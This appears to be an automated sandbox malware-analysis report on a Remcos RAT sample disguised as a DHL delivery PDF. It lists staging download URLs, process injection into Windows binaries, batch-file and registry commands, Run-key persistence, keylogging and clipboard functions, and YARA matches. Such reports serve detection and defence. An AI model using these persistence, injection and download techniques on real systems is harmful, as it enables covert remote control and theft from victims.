Source: Iqzenco.exe, 00000010.00000003.750864485.00000000007B1000.00000004.00000001.sdmp; String found in binary or memory: https://bl30uw.sn.files.1drv.com/y4mGst0byrg6Ub0CK8iKHaximJI4M7D1uUmqxfl02ZpIfKXbkyeYXQLL6P2J6UxS4Yz
Source: Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmp; String found in binary or memory: https://bl30uw.sn.files.1drv.com/y4maOmpRLgEZgKpnLv-hczrMb96VqtMQDZd-m0g51QRpK-v8c65WYNUi2NOLDdGNQiU
Source: Iqzenco.exe, 00000010.00000003.750846747.00000000007A3000.00000004.00000001.sdmp; String found in binary or memory: https://bl30uw.sn.files.1drv.com/y4msI7_EyjC8cs97rdyt7ReCTl2WoedGiqx9hVOiugfpodFj4cXgoX5lAQfrGe41zrt
Source: Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmp; String found in binary or memory: https://onedrive.live.com/download?cid=97429F42E815B766&resid=97429F42E815B766%21166&authkey=AFRFbbm
Source: unknown; DNS traffic detected: queries for: onedrive.live.com
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_0041242F Sleep,URLDownloadToFileW,22_2_0041242F
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_004126A5 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,22_2_004126A5
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_004089BC GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,22_2_004089BC

E-Banking Fraud:

Yara detected Remcos RAT
Source: the same 24 Yara matches listed under AV Detection above (12 unpacked PEs, 9 memory dumps, 3 process memory spaces)

System Summary:

Malicious sample detected (through community Yara rule)
Matched rule: REMCOS_RAT_variants, Author: unknown; sources of type UNPACKEDPE:
  • 22.2.mobsync.exe.50601a02.1.unpack
  • 5.2.mobsync.exe.400000.0.raw.unpack
  • 26.2.secinit.exe.400000.0.unpack
  • 5.2.mobsync.exe.50601a02.1.unpack
  • 26.2.secinit.exe.50601a02.1.raw.unpack
  • 5.2.mobsync.exe.400000.0.unpack
  • 26.2.secinit.exe.50601a02.1.unpack
  • 5.2.mobsync.exe.50601a02.1.raw.unpack
  • 22.2.mobsync.exe.400000.0.unpack
  • 26.2.secinit.exe.400000.0.raw.unpack
  • 22.2.mobsync.exe.50601a02.1.raw.unpack
  • 22.2.mobsync.exe.400000.0.raw.unpack
Matched rule: REMCOS_RAT_variants, Author: unknown; sources of type MEMORY:
  • 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp
  • 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp
  • 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp
Initial sample is a PE file and has a suspicious name
Source: initial sample; Static PE information: Filename: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Matched rule REMCOS_RAT_variants: Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Sources of type UNPACKEDPE: 22.2.mobsync.exe.50601a02.1.unpack, 5.2.mobsync.exe.400000.0.raw.unpack, 26.2.secinit.exe.400000.0.unpack, 5.2.mobsync.exe.50601a02.1.unpack, 26.2.secinit.exe.50601a02.1.raw.unpack, 5.2.mobsync.exe.400000.0.unpack, 26.2.secinit.exe.50601a02.1.unpack, 5.2.mobsync.exe.50601a02.1.raw.unpack, 22.2.mobsync.exe.400000.0.unpack, 26.2.secinit.exe.400000.0.raw.unpack, 22.2.mobsync.exe.50601a02.1.raw.unpack, 22.2.mobsync.exe.400000.0.raw.unpack
Sources of type MEMORY: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp
              Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: C:\Users\Public\Libraries\ocnezqI.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_00412598 ExitWindowsEx,LoadLibraryA,GetProcAddress
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0042E02D
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_004330D1
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0043424F
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0042220F
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0041A3F8
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042E02D
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004330D1
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0043424F
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042220F
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0041A3F8
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004304DB
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0044C56A
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004335CD
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0043E6E0
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0044A725
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004378EC
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004228AD
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004339E5
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004229F0
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 0042EDF6 appears 64 times
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 00402064 appears 87 times
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 0042F460 appears 43 times
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 004165D8 appears 37 times
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 004020B5 appears 31 times
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 00404818 appears 31 times
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Iqzenco.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: Iqzenco.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Virustotal: Detection: 26%
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | ReversingLabs: Detection: 24%
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File read: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown | Process created: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe 'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe'
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
              Source: unknown | Process created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_004132F7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004132F7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/10@49/2
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0040D1AD GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CreateMutexA,CloseHandle
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
              Source: C:\Windows\SysWOW64\mobsync.exe | Mutant created: \Sessions\1\BaseNamedObjects\Remcos-8VTGWT
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_01
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0040D41E FindResourceA,LoadResource,LockResource,SizeofResource
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\mobsync.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_00458435 push esi; ret 22_2_0045843E
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042F4A6 push ecx; ret 22_2_0042F4B9
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_00450918 push eax; ret 22_2_00450936
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: .....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: .....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: .....
              Source: Iqzenco.exe.0.dr | Static PE information: section name: .....
              Source: Iqzenco.exe.0.dr | Static PE information: section name: ......
              Source: Iqzenco.exe.0.dr | Static PE information: section name: .....
              Source: Iqzenco.exe.0.dr | Static PE information: section name: ....
              Source: Iqzenco.exe.0.dr | Static PE information: section name: ......
              Source: Iqzenco.exe.0.dr | Static PE information: section name: ....
              Source: Iqzenco.exe.0.dr | Static PE information: section name: ......
              Source: Iqzenco.exe.0.dr | Static PE information: section name: ......
              Source: Iqzenco.exe.0.dr | Static PE information: section name: .....
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress
              Source: initial sample | Static PE information: section where entry point is pointing to: ......
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File created: \entrega de documentos dhl _ 27-09-21,pdf.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Iqzenco

              Hooking and other Techniques for Hiding and Protection:

              Icon mismatch, binary includes an icon from a different legit application in order to fool users
              Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: icon4828.png
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Delayed program exit found
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0040D455 Sleep,ExitProcess
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0040D455 Sleep,ExitProcess
              Source: C:\Windows\SysWOW64\mobsync.exe TID: 3628 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\mobsync.exe TID: 3880 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\secinit.exe TID: 2388 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\mobsync.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\SysWOW64\mobsync.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\secinit.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_00406176 FindFirstFileW,FindNextFileW
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_00406176 FindFirstFileW,FindNextFileW
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004456A9 FindFirstFileExA
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\SysWOW64\mobsync.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\secinit.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0044697D GetProcessHeap
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0043B789 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0042F1CD SetUnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_004360A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042F1CD SetUnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004360A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042F62C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

              HIPS / PFW / Operating System Protection Evasion:

              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2C60000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2C70000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2C80000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D10000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D20000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D30000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D40000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D50000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D60000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D70000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D80000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 50600000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D90000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2DA0000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D30000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D40000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D50000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2DE0000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2DF0000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3000000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3010000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3020000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3030000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3040000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3050000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 50600000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3060000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3070000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 2F50000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 2F60000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 2F70000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3200000
